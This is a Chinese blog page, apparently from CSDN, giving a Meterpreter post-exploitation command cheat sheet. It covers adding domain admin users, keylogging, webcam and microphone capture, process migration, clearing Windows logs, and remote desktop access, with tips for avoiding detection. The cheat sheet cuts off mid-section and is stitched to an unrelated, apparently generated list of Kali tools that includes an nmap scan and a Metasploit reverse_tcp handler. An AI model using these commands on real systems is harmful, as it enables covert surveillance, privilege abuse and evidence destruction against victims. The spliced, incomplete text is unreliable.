Meterpreter后渗透模块命令字典

本文详细介绍了Meterpreter后渗透阶段的各种操作,包括系统命令、文件操作、网络操作、信息收集、提权和后门植入,如快捷操作、端口转发、抓取密码hash、注册表后门等,是渗透测试人员的重要参考资料。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.系统命令

1.快捷操作

此板块用于记录用于操作meterpreter的指令

sessions    #查看全部会话 –h 查看帮助
sessions -i <shell ID>  #进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息

2.基础系统命令

getuid # 查看权限 
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
add_user username password -h ip    #在远程目标主机上添加一个用户

add_group_user "Domain Admins" username -h ip    #将用户添加到目标主机的域管理员组中

3.外设操作

用于操作目标机外设来实现一些迷惑操作

uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频,不要开启流,非常容易被抓到
keyscan_start  #开始键盘记录
keyscan_dump   #导出记录数据
keyscan_stop #结束键盘记录
record_mic    #音频录制

4.隐藏痕迹

getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中
kill <pid值>   #杀死进程
clearav  #清除windows中的应用程序日志、系统日志、安全日志

5.远程桌面

enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接,只可以看

# 不推荐连接远程桌面,非要连用vnc,不要用getgui
run getgui –h #查看帮助 
run getgui -e #开启远程桌面
### Kali Linux 常用渗透测试工具 #### 一、信息收集类 - **Nmap** 用于网络发现和安全审计,能够扫描大型网络中的主机和服务。其灵活性使得它成为网络安全专家不可或缺的工具之一[^2]。 ```bash nmap -sS -O scanme.nmap.org ``` - **theHarvester** 可以从多个公共搜索引擎和其他数据源获取电子邮件地址以及子域名等信息,有助于构建目标组织的信息库。 #### 二、漏洞分析类 - **OpenVAS** 提供全面的安全漏洞评估解决方案,支持自动化的脆弱性检测流程,并能生成详细的报告来帮助管理员理解潜在风险所在。 - **Nessus** 同样是一款强大的漏洞扫描器,除了基本功能外还具备Web应用程序安全性检查等功能,在企业级环境中广泛应用。 #### 三、密码破解类 - **John the Ripper** 一种快速有效的口令破解软件,适用于多种加密算法下的离线字典攻击场景;对于弱密码防护有着显著效果。 - **Hashcat** 当前最先进且速度最快的GPU加速型哈希值解密程序之一,兼容超过数百种不同的散列类型,是处理复杂度较高场合下首选方案。 #### 四、利用工具类 - **Metasploit Framework** 作为一款模块化设计的支持插件扩展架构的安全漏洞研究平台,不仅限于简单的payload投递操作,更强调整个过程链路的设计与实现,包括但不限于前期情报搜集到最后阶段权限维持等方面的工作[^3]。 ```ruby use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp run ``` #### 五、无线攻击类 - **Aircrack-ng** 专为802.11 WEP/WPA/WPA2 加密协议而生的一套完整的Wi-Fi 安全测试套装,内含监听模式抓包、注入伪造帧等多种实用特性,广泛应用于无线网络安全领域内的攻防演练活动中。 #### 六、网站应用测试类 - **OWASP ZAP (Zed Attack Proxy)** 由OWASP 组织维护的一个易于使用的集成环境,旨在协助开发者找到存在于web 应用里的安全隐患之处,通过代理流量的方式拦截请求响应对交互细节进行全面审查。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值